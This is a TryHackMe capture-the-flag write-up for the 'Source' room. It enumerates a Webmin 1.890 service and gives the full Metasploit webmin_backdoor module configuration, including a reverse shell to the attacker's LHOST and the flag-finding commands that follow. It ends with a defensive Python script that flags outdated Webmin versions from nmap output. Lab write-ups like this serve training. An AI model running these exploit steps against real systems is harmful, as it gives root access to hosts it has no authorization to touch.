Challenges: Source (TryHackMe)

Jebitok

In this engagement, the goal was to enumerate and compromise the attached machine to identify the root cause of a service disruption and gain full system control. The initial phase focused on reconnaissance, starting with network scanning and web directory enumeration. During this process, I discovered an open management interface on port 10000 running Webmin, which redirected to an AWS EC2 internal hostname. This finding hinted at a potential vulnerability in the Webmin service, making it a prime target for exploitation.

Embark

Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?


This virtual machine is also included in the room AttackerKB as part of a guided experience. Additionally, you can download the OVA of Source for offline usage from https://www.darkstar7471.com/resources.html

I started by enumerating the target.

First I used nmap to check for open ports:

nmap -sV IP_Address

I tried gobuster against the web root, but it didn't reveal anything; I also ran it against port 10000, which was open:

gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt

I then browsed to http://IP_Address:10000, which showed an option to redirect to an AWS EC2 instance DNS hostname: ip-10-10-148-184.eu-west-1.compute.internal

Following the redirect to the EC2 hostname shows a browser "Potential Security Risk Ahead" warning, but we opt to advance.

Advancing redirects us to a Webmin login page. It requires credentials, but an exploit for this version is likely to be available on Exploit-DB:

searchsploit webmin 1.890

Exploit Title | Path
--- | ---
Webmin < 1.920 - 'rpc.cgi' Remote Code Execut | linux/webapps/47330.rb

Shellcodes: No Results

I then moved on to Metasploit:

msfconsole

search webmin

The 10th result, exploit/linux/http/webmin_backdoor, looked like what we needed:

use 10

show options

set RHOSTS TARGET_IP

set RPORT 10000

set SSL true

set LHOST ATTACK_MACHINE_IP

set LPORT 4444

set ForceExploit true

run

When I first ran the above, I had not set `set SSL true` and `set RPORT 10000`. Once those were set and the module was run, it opened a command shell on the target that was already running as root, from which both the user and root flags can be found.

Answer the questions below

  1. user.txt

    find / -type f -name user.txt 2>/dev/null

  2. root.txt

    find / -type f -name root.txt 2>/dev/null

Through systematic enumeration and targeted exploitation, I leveraged a known Webmin backdoor vulnerability to gain remote command execution on the target. Proper configuration of the exploit parameters allowed me to establish a shell with root privileges, granting full control over the system. Ultimately, I was able to retrieve both the user and root flags, confirming complete compromise of the host. This exercise underscores the importance of keeping administrative services patched and secured, as well as restricting access to critical management interfaces.
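As an added example that is not part of the original writeup, the following Python script turns the reconnaissance above into a defender-side check: it parses `nmap -sV` output of the form the scan produced, flags a management interface exposed on port 10000, and compares a detected Webmin (MiniServ) version against 1.920, the first release outside the "Webmin < 1.920" range shown by searchsploit. The sample scan output is constructed, and the set of management ports and the severity labels are my own assumptions rather than anything from the room.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample of `nmap -sV` output, modelled on the scan in this writeup.
# nmap reports Webmin's built-in web server as "MiniServ <version> (Webmin httpd)".
SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
"""

# Webmin 1.920 is the first release outside the "Webmin < 1.920" range listed by searchsploit.
FIXED_WEBMIN_VERSION = (1, 920)

# Assumption: management interfaces that should only be reachable from an admin network.
MANAGEMENT_PORTS = {10000}

# One nmap port line: "<port>/<proto> open <service> <version info>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
WEBMIN_BANNER = re.compile(r"MiniServ\s+(\d+(?:\.\d+)+)\s+\(Webmin")


@dataclass
class Finding:
    port: int
    severity: str
    message: str


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '1.890' into (1, 890) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def assess_nmap_output(output: str) -> List[Finding]:
    """Walk nmap -sV port lines and return exposure and patch-level findings."""
    findings: List[Finding] = []
    for raw in output.splitlines():
        match = PORT_LINE.match(raw.strip())
        if not match:
            continue  # header, blank, or some other non-port line
        port = int(match.group(1))
        version_info = match.group(4)

        if port in MANAGEMENT_PORTS:
            findings.append(Finding(
                port, "medium",
                f"management interface reachable on {port}/tcp; restrict it to an admin network",
            ))

        banner = WEBMIN_BANNER.search(version_info)
        if banner and parse_version(banner.group(1)) < FIXED_WEBMIN_VERSION:
            findings.append(Finding(
                port, "high",
                f"Webmin {banner.group(1)} is below 1.920 and has a published RCE; upgrade it",
            ))
    return findings


if __name__ == "__main__":
    for finding in assess_nmap_output(SAMPLE_NMAP_OUTPUT):
        print(f"[{finding.severity}] port {finding.port}: {finding.message}")
```

Versions are compared as integer tuples rather than strings so that, for example, 1.930 sorts after 1.920; a plain string comparison would still work for Webmin's three-digit minor numbers but breaks as soon as a component changes width. Pipe the real scan in with `nmap -sV IP_Address | python3 check.py` by reading `sys.stdin` instead of the constructed sample.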
